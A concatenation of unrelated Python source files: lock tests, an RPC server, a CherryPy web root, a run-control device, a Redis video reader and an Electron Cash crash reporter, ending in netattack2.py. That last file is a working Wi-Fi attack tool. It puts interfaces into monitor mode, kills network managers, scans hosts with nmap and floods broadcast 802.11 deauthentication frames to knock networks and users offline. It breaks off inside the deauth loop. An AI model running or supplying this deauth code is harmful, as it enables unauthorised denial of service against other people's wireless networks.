# fails, as read lock is dropped after first exit
with pytest.raises(FileLocked):
with lock.read_lock(timeout=1):
pass
@pytest.mark.skip('Not supported!')
def test_writer_to_reader(lock_dir):
lock = ReaderWriterLock(lock_dir)
# fails to release second time, as is already released
with lock.write_lock(timeout=1):
with lock.read_lock(timeout=1):
pass
@pytest.mark.skip('Not supported!')
def test_writer_to_writer(lock_dir):
lock = ReaderWriterLock(lock_dir)
# fails to release second time, as is already released
with lock.write_lock(timeout=1):
with lock.write_lock(timeout=1):
pass
def _find_overlaps(times, start, end):
overlaps = 0
for (s, e) in times:
if s >= start and e <= end:
overlaps += 1
return overlaps
def _spawn_variation(readers, writers, lock_dir, disk_cache_dir):
times = {'w': Deque(directory=disk_cache_dir / 'w'),
'r': Deque(directory=disk_cache_dir / 'r')}
def func(type_):
lock = (ReaderWriterLock(lock_dir).write_lock if type_ == 'w' else
ReaderWriterLock(lock_dir).read_lock)
with lock(timeout=5):
enter_time = time.monotonic()
time.sleep(random.random() / 100)
exit_time = time.monotonic()
times[type_].append((enter_time, exit_time))
# time.sleep(0.0001)
pool = ProcessPool(readers + writers)
pool.map(func, ['w'] * writers + ['r'] * readers)
return list(times['w']), list(times['r'])
def test_multi_reader_multi_writer(lock_dir, disk_cache_dir):
writer_times, reader_times = _spawn_variation(10, 10, Path(lock_dir), Path(disk_cache_dir))
assert len(writer_times) == 10
assert len(reader_times) == 10
for start, stop in writer_times:
assert _find_overlaps(reader_times, start, stop) == 0
assert _find_overlaps(writer_times, start, stop) == 1
for start, stop in reader_times:
assert _find_overlaps(writer_times, start, stop) == 0
def test_multi_reader_single_writer(lock_dir, disk_cache_dir):
writer_times, reader_times = _spawn_variation(9, 1, Path(lock_dir), Path(disk_cache_dir))
assert len(writer_times) == 1
assert len(reader_times) == 9
start, stop = writer_times[0]
assert _find_overlaps(reader_times, start, stop) == 0
def test_multi_writer(lock_dir, disk_cache_dir):
writer_times, reader_times = _spawn_variation(0, 10, Path(lock_dir), Path(disk_cache_dir))
assert len(writer_times) == 10
assert len(reader_times) == 0
for (start, stop) in writer_times:
assert _find_overlaps(writer_times, start, stop) == 1
|
server.py | import logging
import time
import ssl
import threading
from msgpack import packb, unpackb
from gevent.server import StreamServer
from prometheus_client import Summary, Counter
import arrpc.metrics as m
from arrpc.error import AuthException, RpcException
from arrpc.utils import recvall, verify_msg
from arrpc import logger
class Server(object):
def __init__(self, host: str, port: int, handler, debug: bool = False,
tls_certfile: str = None, tls_keyfile: str = None, auth_secret: str = None,
metrics: bool = False, metrics_port: int = 9095):
self.host = host
self.port = port
self.handler = handler
self.auth_secret = auth_secret
self.ssl_context = None
if tls_certfile and tls_keyfile:
self.ssl_context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.ssl_context.load_cert_chain(tls_certfile, tls_keyfile)
if debug:
logger.setLevel(logging.DEBUG)
self.metrics = metrics
self.metrics_port = metrics_port
if metrics:
with m.metrics_mutex:
if not m.shared_hostname_label:
m.shared_hostname_label = m.hostname()
if not m.shared_namespace_label:
m.shared_namespace_label = m.k8s_namespace()
if not m.shared_metrics["arrpc_server_metric_seconds"]:
m.shared_metrics["arrpc_server_metric_seconds"] = Summary(
"arrpc_server_req_seconds",
"Time spent handling server requests",
("hostname", "k8s_namespace", "remote_address", "handler_func", "signed_payload", "tls")
)
if not m.shared_metrics["arrpc_server_metric_bytes"]:
m.shared_metrics["arrpc_server_metric_bytes"] = Summary(
"arrpc_server_req_bytes",
"Size of server requests in bytes",
("hostname", "k8s_namespace", "remote_address", "handler_func", "signed_payload", "tls")
)
if not m.shared_metrics["arrpc_server_metric_errors"]:
m.shared_metrics["arrpc_server_metric_errors"] = Counter(
"arrpc_server_errors",
"RPC server errors",
("hostname", "k8s_namespace", "remote_address", "handler_func", "signed_payload", "tls", "reason")
)
def start(self, background: bool = False):
def _gevent_handler(socket, address):
logger.debug(f"Connection from {address}")
while True:
msg = None
try:
msg = recvall(socket)
except ConnectionResetError:
pass
if not msg:
logger.debug(f"Connection from {address} closed")
break
if self.metrics:
start_time = time.time()
try:
msg_unpacked = unpackb(msg, raw=False)
except Exception as e:
logger.debug(f"Failed to unpack message, most likely not MessagePack: {e}")
msg_unpacked = None
if msg_unpacked:
logger.debug(f"Received message from {address}")
response = None
if self.auth_secret:
try:
msg_unpacked = verify_msg(msg_unpacked, self.auth_secret)
logger.debug(f"Verified message signature")
except AuthException as e:
logger.debug(e)
error_msg = "Invalid or missing message signature, make sure 'auth_secret' is set/correct"
if self.metrics:
m.shared_metrics["arrpc_server_metric_errors"].labels(
m.shared_hostname_label, # hostname
m.shared_namespace_label, # k8s_namespace
address[0], # remote_address
self.handler.__name__, # handler_func
self.auth_secret is not None, # signed_payload
self.ssl_context is not None, # tls
error_msg # reason
).inc()
response = f"arrpc.error.AuthException: {error_msg}"
if not response:
logger.debug(f"Passing message to handler function")
try:
response = self.handler(msg_unpacked)
except RpcException as e:
if self.metrics:
m.shared_metrics["arrpc_server_metric_errors"].labels(
m.shared_hostname_label, # hostname
m.shared_namespace_label, # k8s_namespace
address[0], # remote_address
self.handler.__name__, # handler_func
self.auth_secret is not None, # signed_payload
self.ssl_context is not None, # tls
str(e) # reason
).inc()
response = f"arrpc.error.RpcException: {e}"
response_packed = packb(response, use_bin_type=True)
try:
socket.sendall(response_packed)
logger.debug(f"Sent response back to {address}")
except Exception as e:
logger.debug(f"Failed to send response back to {address}: {e}")
break
if self.metrics:
m.shared_metrics["arrpc_server_metric_seconds"].labels(
m.shared_hostname_label, # hostname
m.shared_namespace_label, # k8s_namespace
address[0], # remote_address
self.handler.__name__, # handler_func
self.auth_secret is not None, # signed_payload
self.ssl_context is not None # tls
).observe(time.time() - start_time)
m.shared_metrics["arrpc_server_metric_bytes"].labels(
m.shared_hostname_label, # hostname
m.shared_namespace_label, # k8s_namespace
address[0], # remote_address
self.handler.__name__, # handler_func
self.auth_secret is not None, # signed_payload
self.ssl_context is not None # tls
).observe(len(msg))
if self.metrics:
m.start_metrics_server(self.metrics_port)
if self.ssl_context:
server = StreamServer((self.host, self.port), _gevent_handler,
ssl_context=self.ssl_context)
logger.info(f"Listening on TCP/TLS {self.host}:{self.port}\n")
else:
server = StreamServer((self.host, self.port), _gevent_handler)
logger.info(f"Listening on TCP {self.host}:{self.port}\n")
if background:
t = threading.Thread(target=server.serve_forever)
t.setDaemon(True)
t.start()
else:
server.serve_forever()
|
root.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Root for webserver. Specifies frontpage, errorpage (default),
and pages for restarting and shutting down server.
"""
import os
import sys
import cherrypy
import htpc
import logging
from threading import Thread
from cherrypy.lib.auth2 import *
def do_restart():
arguments = sys.argv[:]
arguments.insert(0, sys.executable)
if sys.platform == 'win32':
arguments = ['"%s"' % arg for arg in arguments]
os.chdir(os.getcwd())
cherrypy.engine.exit()
os.execv(sys.executable, arguments)
class RestrictedArea:
# all methods in this controller (and subcontrollers) is
# open only to members of the admin group
_cp_config = {
'auth.require': [member_of('admin')]
}
class Root:
""" Root class """
def __init__(self):
""" Do nothing on load """
self.logger = logging.getLogger('htpc.root')
pass
auth = AuthController()
restricted = RestrictedArea()
@cherrypy.expose()
@require()
def index(self):
""" Load template for frontpage """
return htpc.LOOKUP.get_template('dash.html').render(scriptname='dash')
@cherrypy.expose()
def default(self, *args, **kwargs):
""" Show error if no matching page can be found """
return "An error occured"
@cherrypy.expose()
@require(member_of("admin"))
def shutdown(self):
""" Shutdown CherryPy and exit script """
self.logger.info("Shutting down htpc-manager.")
cherrypy.engine.exit()
return "HTPC Manager has shut down"
@cherrypy.tools.json_out()
@cherrypy.expose()
@require()
def restart(self):
""" Shutdown script and rerun with the same variables """
self.logger.info("Restarting htpc-manager.")
Thread(target=do_restart).start()
return "Restart in progress."
@cherrypy.expose()
@require()
def logout(self, from_page="/"):
sess = cherrypy.session
username = sess.get(SESSION_KEY, None)
sess[SESSION_KEY] = None
if username:
cherrypy.request.login = None
raise cherrypy.HTTPRedirect(str(htpc.WEBDIR) or from_page)
|
_RunControl.py | #-----------------------------------------------------------------------------
# Title : PyRogue base module - Run Control Device Class
#-----------------------------------------------------------------------------
# This file is part of the rogue software platform. It is subject to
# the license terms in the LICENSE.txt file found in the top-level directory
# of this distribution and at:
# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
# No part of the rogue software platform, including this file, may be
# copied, modified, propagated, or distributed except according to the terms
# contained in the LICENSE.txt file.
#-----------------------------------------------------------------------------
import pyrogue as pr
import threading
import time
class RunControl(pr.Device):
"""Special base class to control runs. """
def __init__(self, *, hidden=True, rates=None, states=None, cmd=None, **kwargs):
"""Initialize device class"""
if rates is None:
rates={1:'1 Hz', 10:'10 Hz'}
if states is None:
states={0:'Stopped', 1:'Running'}
pr.Device.__init__(self, hidden=hidden, **kwargs)
value = [k for k,v in states.items()][0]
self._thread = None
self._cmd = cmd
self.add(pr.LocalVariable(
name='runState',
value=value,
mode='RW',
disp=states,
localSet=self._setRunState,
description='Run state of the system.'))
value = [k for k,v in rates.items()][0]
self.add(pr.LocalVariable(
name='runRate',
value=value,
mode='RW',
disp=rates,
localSet=self._setRunRate,
description='Run rate of the system.'))
self.add(pr.LocalVariable(
name='runCount',
value=0,
typeStr='UInt32',
mode='RO',
pollInterval=1,
description='Run Counter updated by run thread.'))
def _setRunState(self,value,changed):
"""
Set run state. Re-implement in sub-class.
Enum of run states can also be overridden.
Underlying run control must update runCount variable.
"""
if changed:
if self.runState.valueDisp() == 'Running':
#print("Starting run")
self._thread = threading.Thread(target=self._run)
self._thread.start()
elif self._thread is not None:
#print("Stopping run")
self._thread.join()
self._thread = None
def _setRunRate(self,value):
"""
Set run rate. Re-implement in sub-class if necessary.
"""
pass
def _run(self):
#print("Thread start")
self.runCount.set(0)
while (self.runState.valueDisp() == 'Running'):
time.sleep(1.0 / float(self.runRate.value()))
if self._cmd is not None:
self._cmd()
with self.runCount.lock:
self.runCount.set(self.runCount.value() + 1,write=False)
|
past_video_image.py | import multiprocessing
# Copyright 2020 Wearless Tech Inc All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from .chunker import Chunker, ChImage
from .log import logger
from .ch_errors import VideoFailedToStart, VideoHistoryNotFound, InfrequentException
import av
import numpy
import datetime
import operator
import multiprocessing as mp
import sys
class PastVideoImage:
def __init__(self, redis_conn, stream_name, audio_stream_name, codec=av.Codec('h264', 'r').create()):
self.__redis_conn = redis_conn
self.__stream_name = stream_name
self.__audio_stream_name = audio_stream_name
self.__last_history_query = None
self.__last_history_query_timestamp = 0
self.__history_chunker = None
self.__last_history_request_time = 0
self.__history_queue = mp.Queue()
self.__is_first_run = True
self.__lock = mp.Lock()
def get_latest_image_from(self, fromtimestamp, totimestamp) -> ChImage:
redis_time = self.__redis_conn.time()
redis_time = int(redis_time[0] + (redis_time[1] / 1000000)) * 1000
self.__process = mp.Process(target=self.fetch_next_frames, args=(totimestamp,True,))
with self.__lock:
if self.__last_history_request_time == 0:
self.__last_history_request_time = redis_time
if self.__last_history_query_timestamp == 0:
self.__last_history_query_timestamp = fromtimestamp
self.__last_history_query = str(self.__last_history_query_timestamp)
self.__history_chunker = Chunker(codec=av.Codec('h264', 'r').create())
self.__history_queue = mp.Queue()
else:
# check if more than 10 seconds between 2 queries, throw exception
last_query_diff = abs(self.__last_history_request_time - redis_time)
if last_query_diff > 10*1000:
self.__history_cleanup()
raise InfrequentException
self.__last_history_request_time = redis_time
if self.__is_first_run:
self.__process.start()
self.__is_first_run = False
while True:
if self.__history_queue.qsize() > 0:
img = self.__history_queue.get()
if img.timestamp == 0 and img.data is None:
# sentinel img received (no more data)
break
else:
return img
else:
time.sleep(0.1)
self.__history_cleanup()
return None
def stop_now(self):
with self.__lock:
self.__last_history_query_timestamp = sys.maxsize
def fetch_next_frames(self, totimestamp, is_forward_process=False):
while True:
if self.__last_history_query_timestamp < totimestamp:
if self.__history_queue.qsize() < 10:
# dt_object = datetime.datetime.fromtimestamp(int(self.__last_history_query_timestamp / 1000))
# logger.debug("running process {}".format(self.__last_history_query_timestamp))
buffer = self.__redis_conn.xread({self.__stream_name:self.__last_history_query}, block=1000, count=10)
# start_time = time.time()
if len(buffer) > 0:
arr = buffer[0]
inner_buffer = arr[1]
# logger.debug("returned packets: {} in {} s".format(len(inner_buffer), (time.time() - start_time)))
last = inner_buffer[-1]
with self.__lock:
self.__last_history_query = last[0]
self.__last_history_query_timestamp = int(self.__last_history_query.decode('utf-8').split("-")[0])
# logger.debug("NEXT ONE should query FROM: {}".format(self.__last_history_query))
frames = self.__history_chunker.frames(inner_buffer)
if len(frames) > 0:
for frame_ts, frame in frames.items():
d = frame.to_ndarray(format="bgr24")
chImage = ChImage(data=d, width=frame.width, height=frame.height, timestamp=frame_ts, frame_type=frame.pict_type.name)
self.__history_queue.put(chImage)
else:
if is_forward_process:
time.sleep(0.15)
else:
break
else:
sentinel_img = ChImage(data=None, width=0, height=0, timestamp=0)
self.__history_queue.put(sentinel_img)
self.__history_queue.close()
break
def __history_cleanup(self):
with self.__lock:
self.__last_history_query_timestamp = 0
self.__last_history_query = None
self.__last_history_request_time = 0
self.__history_chunker = None
if self.__history_queue is not None:
self.__history_queue.close() |
crashreporter.py | #
# This file is:
# Copyright (C) 2018 Calin Culianu <calin.culianu@gmail.com>
#
# MIT License
from . import utils
from . import gui
from electroncash.i18n import _
from .uikit_bindings import *
from .custom_objc import *
import json, traceback, requests, sys
from electroncash import PACKAGE_VERSION
issue_template = """<font face=arial color="#414141">
<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electron Cash version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
</font>
"""
#BauerJ's testing server
#report_server = "https://crashhubtest.bauerj.eu/crash"
# "Live" (Marcel's server)
report_server = "https://crashhub.electroncash.org/crash"
Singleton = None
class CrashReporterVC(CrashReporterBase):
@objc_method
def dealloc(self) -> None:
global Singleton
Singleton = None
utils.nspy_pop(self)
send_super(__class__, self, 'dealloc')
@objc_method
def viewDidLoad(self) -> None:
send_super(__class__, self, 'viewDidLoad')
global Singleton
Singleton = self
self.report.text = ""
self.reportTit.setText_withKerning_(_("Report Contents"), utils._kern)
self.descTit.setText_withKerning_(_("Please briefly describe what led to the error (optional):").translate({ord(':'):None}), utils._kern)
utils.uilabel_replace_attributed_text(self.errMsg,
_('Sorry!') + " " + _('Something went wrong running Electron Cash.') + " " + _('To help us diagnose and fix the problem, you can send us a bug report that contains useful debug information:').translate({ord(':'):None}),
font = UIFont.italicSystemFontOfSize_(12.0)
)
self.descDel.placeholderFont = UIFont.italicSystemFontOfSize_(14.0)
self.descDel.font = UIFont.systemFontOfSize_(14.0)
self.descDel.placeholderText = _('Tap to enter text...')
self.descDel.text = ""
self.title = _('Crash Reporter')
@objc_method
def viewWillAppear_(self, animated : bool) -> None:
send_super(__class__, self, 'viewWillAppear:', animated, argtypes=[c_bool])
self.kbas = utils.register_keyboard_autoscroll(self.sv)
# Below will be enabled if we have valid exception info
self.sendBut.setEnabled_(False)
utils.uiview_set_enabled(self.sendBut, False)
@objc_method
def viewWillDisappear_(self, animated : bool) -> None:
send_super(__class__, self, 'viewWillDisappear:', animated, argtypes=[c_bool])
if self.kbas:
utils.unregister_keyboard_autoscroll(self.kbas)
self.kbas = 0
@objc_method
def viewDidAppear_(self, animated : bool) -> None:
send_super(__class__, self, 'viewDidAppear:', animated, argtypes=[c_bool])
ei = _Get(self)
if ei:
self.report.attributedText = utils.nsattributedstring_from_html(_get_report_string(self))
self.sendBut.setEnabled_(True)
utils.uiview_set_enabled(self.sendBut, True)
@objc_method
def onSendBut_(self, sender) -> None:
def SendReport() -> str:
reportDict = _get_traceback_info(self)
reportDict.update(_get_additional_info(self))
report = json.dumps(reportDict)
#reportPretty = json.dumps(reportDict, indent=4)
#utils.NSLog("Report contents: %s", reportPretty)
response = requests.post(report_server, data=report)
return response.text
def onOk() -> None: self.presentingViewController.dismissViewControllerAnimated_completion_(True, None)
def OnSuccess(response : str) -> None:
utils.NSLog("Response from server: %s", response)
response = response.strip()
if len(response) > 255: response = response[:255] + "..."
try:
response = str(utils.nsattributedstring_from_html(response).string)
except:
pass
parent().show_message(message = response, title=_("Report Sent"), vc = self, onOk=onOk)
def OnError(exc) -> None:
parent().show_error(message = str(exc[1]), vc = self)
utils.WaitingDialog(self, _("Sending Report..."), SendReport, OnSuccess, OnError)
def _Get(vc: CrashReporterVC) -> tuple:
return utils.nspy_get_byname(vc, 'exc_info')
def Set(vc : CrashReporterVC, exc_info : tuple) -> None:
utils.nspy_put_byname(vc, exc_info, 'exc_info')
def parent() -> object:
return gui.ElectrumGui.gui
def _get_traceback_info(vc : CrashReporterVC) -> dict:
ei = _Get(vc)
if not ei: return dict()
exc_string = str(ei[1])
stack = traceback.extract_tb(ei[2])
readable_trace = "".join(traceback.format_list(stack))
ident = {
"file": stack[-1].filename,
"name": stack[-1].name,
"type": ei[0].__name__
}
return {
"exc_string": exc_string,
"stack": readable_trace,
"id": ident
}
def _get_additional_info(vc : CrashReporterVC) -> dict:
import platform
bundleVer = "iOS Build: " + str(NSBundle.mainBundle.objectForInfoDictionaryKey_("CFBundleVersion"))
#xtraInfo = bundleVer + "\niOS Version String: " + utils.ios_version_string() + "\n\n"
args = {
"app_version": PACKAGE_VERSION + (" (%s)"%bundleVer),
"python_version": sys.version,
"os": platform.platform() + " " + utils.ios_version_string(),
"wallet_type": "unknown",
"locale": (parent().language or 'UNK'),
"description": (vc.descDel.text if vc.descDel.text else "")
}
if len(args['os']) > 255:
args['os'] = args['os'][:255]
try:
args["wallet_type"] = parent().wallet.wallet_type
except:
# Maybe the wallet isn't loaded yet
pass
return args
def _get_report_string(vc : CrashReporterVC) -> str:
info = _get_additional_info(vc)
ei = _Get(vc)
if not ei: return ""
info["traceback"] = "".join(traceback.format_exception(*ei))
return issue_template.format(**info)
'''
th = None
def Test():
# testing
import time
def duh() -> None:
raise Exception("A random exception!!")
utils.call_later(2.0, duh)
utils.call_later(3.0, duh)
#utils.call_later(10.0, duh)
def duh2() -> None:
global th
def thrd():
global th
try:
utils.NSLog("In another thread.. sleeping 5 secs")
print(th)
time.sleep(5.0)
utils.NSLog("Woke up.. raising exception...")
raise Exception("From another thread!!")
finally:
th = None
import threading
th = threading.Thread(target=thrd, name="Exception thread...", daemon=True)
th.start()
utils.call_later(5.0, duh2)
'''
|
netattack2.py | #!/usr/bin/env python
import os
import sys
import socket
import logging
from threading import Thread
import socket
from time import sleep
from subprocess import Popen, PIPE
# COLORS
B, R, Y, G, N = '\33[94m', '\033[91m', '\33[93m', '\033[1;32m', '\033[0m'
# making scapy quite
logging.getLogger('scapy.runtime').setLevel(logging.ERROR)
try:
import nmap
import argparse
from scapy.all import *
except:
print('\n{0}ERROR: Please install all requirements (README)!\n'.format(R))
sys.exit(1)
# making scapy quite
conf.verb = 0
try:
# check for root privileges
if os.geteuid() != 0:
print('\n{0}ERROR: Netattack needs to be started as a super user (root privileges).\n'.format(R))
sys.exit(1)
# geteuid() throws error on windows
except:
print('\n{0}ERROR: If you\'re using Windows, please start Netattack under Linux.\n'.format(R))
sys.exit(1)
def print_banner():
# IF THE ANIMATION AT THE BEGINNING PISSES YOU OFF, SIMPLY REMOVE sleep(x) :)
os.system('clear')
print('''{0}{1}
O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O
O O O O O O O O O O O O O O
O O O O O O O O O O O O O O
O O O O O O O O O O O O O O O O O
O O O O O O O O O O O O O O O O O O O O
O O O O O O O O O O O O O O
O O O O O O O O O O O O O O O O O O O O'''.format('\n' * 1, G))
sleep(0.7)
print('''\n\n{0}{1}D I S C O V E R W H A T 'S P O S S I B L E'''.format(' '*40, Y))
sleep(0.4)
print('''{0}{1}b y c h r i z a t o r{2}{3}'''.format(' '*53, R, N, '\n' * 1))
sleep(0.4)
def get_choice():
print('''
{0}-----------
| S C A N |
-----------{4}
{2}({1}1{2}) {4}Scan for Access-Points
{2}({1}2{2}) {4}Scan for hosts in your network
{0}---------------
| A T T A C K |
---------------{4}
{5}DEAUTH
{2}({1}3{2}) {4}Deauth ONE network
{2}({1}4{2}) {4}Deauth MULTIPLE networks
{2}({1}5{2}) {4}Deauth ALL networks in your area
{5}KICK
{2}({1}6{2}) {4}Kick ONE user off your network
{2}({1}7{2}) {4}Kick MULTIPLE users off your network
{2}({1}8{2}) {4}Kick ALL users off your network (except you)
{2}({1}9{2}) {4}EXIT{3}'''.format(G, Y, R, '\n' * 3, N, B))
def choice_input():
global choice
try:
choice = int(input('{0}{1}#{2}> {3}'.format(B, ' ' * 4, R, N)))
except(KeyboardInterrupt):
print('\n{0}Thanks for using NETATTACK! See you later!'.format(G))
sys.exit(1)
except:
print('{0}ERROR: Your input was incorrect.'.format(R))
choice_input()
if choice not in range(1, 11):
print('{0}ERROR: Your input was incorrect.'.format(R))
choice_input()
choice_input()
return choice
def handle_choice():
if choice == 1:
wifi_scan(True, False, True)
elif choice == 2:
host_scan(True, True, False, True)
elif choice == 3:
deauth_one()
elif choice == 4:
deauth_multiple()
elif choice == 5:
deauth_all()
elif choice == 6:
kick_one()
elif choice == 7:
kick_multiple()
elif choice == 8:
kick_all()
elif choice == 9:
print('{0}Thanks for using NETATTACK! See you later!'.format(G))
sys.exit(0)
def get_iface():
def choice_input():
global iface_choice
try:
iface_choice = int(raw_input('{0}{1}#{2}>{3} '.format(B, ' '*4, R, N)))
except(KeyboardInterrupt):
print('\n{0}Thanks for using NETATTACK! See you later!'.format(G))
sys.exit(1)
except:
print('{0}ERROR: Your input was incorrect.'.format(R))
choice_input()
if iface_choice not in iface_dict:
print('{0}ERROR: Your input was incorrect.'.format(R))
choice_input()
os.system('clear')
num = 1
iface_dict = {}
iface = ''
try:
_ = os.listdir('/sys/class/net/')
except:
print('{0}ERROR: Unable to detect interfaces. Please type interface-name manually.'.format(R))
try:
iface = raw_input('\n{0}Interface-Name {1}#{2}>{3} '.format(G, B, R, N))
except:
print('\n{0}Thanks for using NETATTACK! See you later!'.format(G))
sys.exit(1)
if len(iface) > 0:
return iface
print('{0nERROR: Your input was incorrect.\n'.format(R))
print('{0}Please choose an interface that fits your action (wireless, wired...):{1}'.format(G, '\n' * 1))
for iface in os.listdir('/sys/class/net/'):
print('{0}{1}({4}{3}{1}) {2}{5}'.format(' ' * 4, R, N, str(num), Y, iface))
iface_dict[num] = iface
num += 1
print('\n')
choice_input()
iface = iface_dict[iface_choice]
return iface
def get_gateway():
try:
gateway_pkt = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False)
return gateway_pkt.src
except:
os.system('clear')
print('{0}ERROR: Script is unable to retrieve Gateway-IP address.\nPlease type in manually.\n'.format(R))
try:
gateway_ip = raw_input('\n{0}Gateway-IP {1}#{2}>{3} '.format(G, B, R, N))
except(KeyboardInterrupt):
print('\n{0}Thanks for using NETATTACK! See you later!'.format(G))
sys.exit(1)
return gateway_ip
def get_gateway_mac(IP):
nm = nmap.PortScanner()
x = nm.scan(hosts=IP, arguments='-sP')
for k, v in x['scan'].iteritems():
if str(v['status']['state']) == 'up':
return str(v['addresses']['mac'])
os.system('clear')
print('{0}ERROR: Script is unable to retrieve Gateway-MAC address. \nPlease type in manually.\n'.format(R))
gateway_mac = raw_input('\n{0}Gateway-MAC {1}#{2}>{3} '.format(G, B, R, N))
return gateway_mac
def enable_monitor_mode(iface):
try:
os.system('ifconfig {0} down'.format(iface))
os.system('iwconfig {0} mode monitor'.format(iface))
os.system('ifconfig {0} up'.format(iface))
except:
print('{0}INTERFACE ERROR'.format(R))
sys.exit(1)
def disable_monitor_mode(iface):
os.system('ifconfig {0} down'.format(iface))
os.system('iwconfig {0} mode managed'.format(iface))
os.system('ifconfig {0} up'.format(iface))
def wifi_scan(do_output, do_deauth, verbose, iface=None):
global ID
def packet_handler(pkt):
global ID
bssid = pkt.addr2
essid = pkt.info
enc = None
channel = None
cap = pkt.sprintf('{Dot11Beacon:%Dot11Beacon.cap%}'
'{Dot11ProbeResp:%Dot11ProbeResp%}')
elt = pkt[Dot11Elt]
if bssid not in APs:
while isinstance(elt, Dot11Elt):
if elt.ID == 3:
channel = ord(elt.info)
elif elt.ID == 48:
enc = 'WPA2'
elif elt.ID == 221 and elt.info.startswith('\x00P\xf2\x01\x01\x00'):
enc = 'WPA1'
if not enc:
if 'privacy' in cap:
enc = 'WEP'
else:
enc = 'OPEN'
elt = elt.payload
APs[bssid] = {'essid': essid, 'enc': enc, 'channel': channel, 'id': ID}
ID += 1
if do_output and do_print_ap:
output(bssid, essid, enc, channel)
else:
return
def channelhop(iface):
channel = 1
while channel < 14:
if do_channelhop:
try:
os.system('iwconfig {0} channel {1}'.format(iface, channel))
except:
print('{0}INTERFACE ERROR'.format(R))
sys.exit(1)
sleep(0.1)
if channel >= 13:
channel = 1
continue
channel += 1
def output(bssid, essid, enc, channel):
channel_space = 2
if len(str(channel)) == 1:
channel_space = 3
print('{0}{1} {2}| {3}{4}| {5}{6} {2}| {7}{8}{2}'.format(R, bssid.upper(), N, str(channel), ' '*channel_space, B, enc, Y, essid))
ID = 1
if not iface:
iface = get_iface()
if verbose:
print('\n{0}Turning on {1}MONITORING {0}mode ...{2}'.format(G, R, N))
enable_monitor_mode(iface)
os.system('airmon-ng check kill')
thread_channelhop = Thread(target=channelhop, args=[iface])
thread_channelhop.daemon = True
thread_channelhop.start()
if do_output:
if not do_deauth:
os.system('clear')
print('\n{0}BSSID{1}CH{2}ENC{3}ESSID'.format(N, ' '*17, ' '*5, ' '*6))
sniff(iface=iface, prn=packet_handler, lfilter=lambda x: (Dot11ProbeResp in x or Dot11Beacon in x), store=0)
def host_scan(iface_known, do_output, kick_output, verbose):
def get_ip_range():
for net, msk, _, iface, addr in conf.route.routes:
if iface == 'lo' or addr == '127.0.0.1':
continue
if net <= 0 or msk <= 0:
continue
sub = utils.ltoa(net)
cidr = bin(msk).count('1')
return '{0}/{1}'.format(sub, cidr)
def ask_for_ip_range(ip_range):
os.system('clear')
print('{0}The script automatically searched for an IP-Range to be scanned.\nPress {1}ENTER {2}to keep it or {3}type in your custom range{4}.{5}'.format(G, R, G, R, G, N))
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(("8.8.8.8", 80))
print('\n{0}{1}Your local IP: {2}{3}{4}'.format(' ' * 4, Y, R, s.getsockname()[0], N))
s.close()
except:
print('\n{0}{1}Your local IP: {2}{3}{4}'.format(' ' * 4, Y, R, 'ERROR', N))
print('{0}{1}Current IP-Range: {2}{3}{4}'.format(' ' * 4, Y, R, ip_range, N))
try:
user_input = raw_input('\n{0}{1}#{2}>{3} '.format(' ' * 4, B, R, N))
except(KeyboardInterrupt):
print('\n{0}Thanks for using NETATTACK! See you later!'.format(G))
sys.exit(1)
if user_input == '':
return ip_range
else:
return user_input
def output(hosts):
max_ip_length = 0
if len(hosts) == 0:
print('{0}0 hosts are up. :/{1}'.format(R, N))
sys.exit(0)
for ip in hosts:
if len(ip) > max_ip_length:
max_ip_length = len(ip)
print('\n')
for ip in hosts:
if kick_output is True:
print(' [{5}{0}{4}] {1}{2}{3}{4}({5}{6}{4}) | {7}{8}{4}'.format(hosts[ip]['id'], Y, ip,' ' * (max_ip_length-len(ip)+1), N, R, hosts[ip]['mac'], B, hosts[ip]['name']))
else:
print('{0}{1}{2}{3}({4}{5}{3}) | {6}{7}{3}'.format(Y, ip,' ' * (max_ip_length-len(ip)+1), N, R, hosts[ip]['mac'], B, hosts[ip]['name']))
print('\n{0}{1}{2} {3}hosts are up. Finished scanning.\n'.format(' '*4, R, len(hosts), G))
hosts = {}
if not iface_known:
iface = get_iface()
conf.iface = iface
ip_range = get_ip_range()
ip_range = ask_for_ip_range(ip_range)
if verbose:
os.system('clear')
print('{0}Scanning your network. Stand by!{1}'.format(G, N))
ID = 1
nm = nmap.PortScanner()
x = nm.scan(hosts=ip_range, arguments='-sP')
for k, v in x['scan'].iteritems():
if str(v['status']['state']) == 'up':
try:
MAC = str(v['addresses']['mac'])
IP = str(v['addresses']['ipv4'])
except:
continue
try:
NAME = socket.gethostbyaddr(IP)[0]
except:
NAME = 'Unknown NAME'
hosts[IP] = {'mac': MAC, 'name': NAME, 'id': ID}
ID += 1
if do_output:
output(hosts)
return hosts
def deauth_one():
global do_channelhop
def choice_input():
if len(APs) < 1:
print('{0}No Access-Points found :/{1}\n'.format(R, N))
sys.exit(1)
while True:
try:
user_input = raw_input('{0}{1}#{2}>{3} '.format(B, ' '*4, R, N))
except(KeyboardInterrupt):
print('\n{0}Thanks for using NETATTACK! See you later!'.format(G))
sys.exit(1)
try:
_ = int(user_input)
except:
print('{0}ERROR: Your input was incorrect.'.format(R))
continue
if _ not in range(1, len(APs)+1) and _ != 1:
print('{0}ERROR: Your input was incorrect.'.format(R))
continue
return _
def deauth():
print('\n{0}Deauthing ...{1}\n'.format(G, N))
os.system('iwconfig {0} channel {1}'.format(iface, CHANNEL))
while True:
for x in range(64):
try:
send(Dot11(addr1='FF:FF:FF:FF:FF:FF', addr2=BSSID, addr3=BSSID) / Dot11Deauth())
except(KeyboardInterrupt):
print('{0}Deauthing cancelled.{1}'.format(R, N))
sys.exit(1)
